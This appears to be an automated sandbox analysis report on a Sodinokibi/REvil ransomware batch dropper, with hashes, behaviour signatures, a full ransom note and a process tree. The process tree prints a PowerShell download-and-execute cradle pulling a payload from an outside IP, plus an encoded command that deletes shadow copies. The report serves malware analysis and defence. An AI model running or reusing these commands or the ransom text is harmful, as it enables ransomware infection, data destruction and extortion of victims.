Overview

overview

10

Static

static

JFh52PBG.bat

windows7_x64

10

JFh52PBG.bat

windows10_x64

10

Analysis

  • max time kernel
    140s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    05-05-2020 00:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JFh52PBG.bat

  • Size

    195B

  • MD5

    27cfb7797118873eddaffa1b3dfa352a

  • SHA1

    04332f9742db8be098ffc355c45e223e2aac778c

  • SHA256

    f18541c904b443f13026355bd0f39b9e380f708cbc6799da5de746e3fc980962

  • SHA512

    70584344af74c6ea7d80df5956c9fd95877a69e041053194949d30f84f327373d2a2b6328cbb03ef06e6b102736c49c09a77f8356c92530d7d13699f3f846ae5

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/JFh52PBG

Extracted

Path

C:\krz0aw-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension krz0aw. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF44CE8B3125A7CA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/DF44CE8B3125A7CA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 699P89a4QHxywj5L91rfkX++NM/3fWppZgBRxIgk3UvAvZgIpBTbNWCmFpms7TR9 JHnnW1gwto4kxA4tzpwzoDcQOx/lweUHg2zAUFI0cgd1Ie7Sznph0gR8dqTyvnRc 1C3roI6XOEd9IZEJ0Atg0ZkAFpaDRefSVqjnyP7rCeysKrOgar8VPkVYmMmfLr9H b/k9b6Tt3W+oKL5v7pcB9utsqwS0BR3PFGiAvcvNn++Wn6tUIqHpj5MfksNTZ++j zh06k0VheIyklMX2UJDbsdISqRnJuGoEDo4aojvD/2PZsA6/9kUJzxoTcKel01Zb Fc+k9kkiDamdU8JSDh4mBbCOaF5AQxLxRDJz5G8vgvX6JWBkSzyBDMZXrElr6u4t iq/G6seAGSqVkd7SFZatVR2dHAVqutSFq6Zgx1vN29RCKJEw7qgiJfYOPnZCp2k4 YtHrHl7qPUIJ5lqSNSvrswiFSlQROGfhFEwS2bWvvOtf+NjupzC06F9PREPvjYuw RXW6ms7Oo6RkCv79RucoietmiE08gK08LiPq8tefMXte5rzNe+9fCJ4YxQQgVshI gH7SnEDbCJ7mbGxWMsxgst3fDmM+IKRV6+ay1R7bySgr91zfEnAd0/ytZrmfuIgC rCNVN2EBn8wR2Z4xqilUx/mOTC4Ca7yN4gxs33mZfug1EoYzHE1ernUiusRlBaMd FJ+UzN4Da7awet+sJI0zWDbVPkn9thkAQ8/saBZ766TvUBCzGp8asZqmDGto8nnU KqbrxY2dtC5r+NpD45/N3dxn7XJ7bkfUWePVX9NOoC88LwaMx+VssQkCgF5+0s5P iGevxq0yBsWDNk05onK1UGBRWNexkd6A/ixfYDxekp3nqaku7kHgHEou5LJ0Rkuz D3SR2fl43VUR1ZiwCuEHJtO5gRpMRCQTjRWzw+IdZFu56CM6TZc9O9sS9PmPsrH4 pTqDJed1PkBHNIiU9cIc4HHhHIGTvv3MfFHw6O3bghux1yWJLCu3RWeCytSV9YrX LD+dozQh0Lbr9IgAmc37dihhZxOIyLn441BJBZ8pcEhSyMs2OB4tQ6+qc/BpJINH z7ctGDvGvFiE6vANwwbNL3YutK+3OirBQ3IB27mfNP+zzmsGe5IRGw5SfQGHGYPw EpL3o+uJDYN1YFjhKsQwoJ9CmMr1qVCygp788c6DlnotiPbqdheODdSi+2o+N7UZ eRWxu8QBIcDK5Ceh+472yepDe3iSjpP4guCBPiRYR/r6WNvd1uryOQO9pQN/AqVb 3h/J4edvXURh4W09np1WuSnu0YajXnBPC0DvVbweB9U= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF44CE8B3125A7CA

http://decryptor.cc/DF44CE8B3125A7CA

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 124 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Makes http(s) request 47 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Enumerates connected drives 3 TTPs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\JFh52PBG.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/JFh52PBG');Invoke-THAXPPVWDAAX;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in System32 directory
      • Drops file in Program Files directory
      PID:868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1176
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:464

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit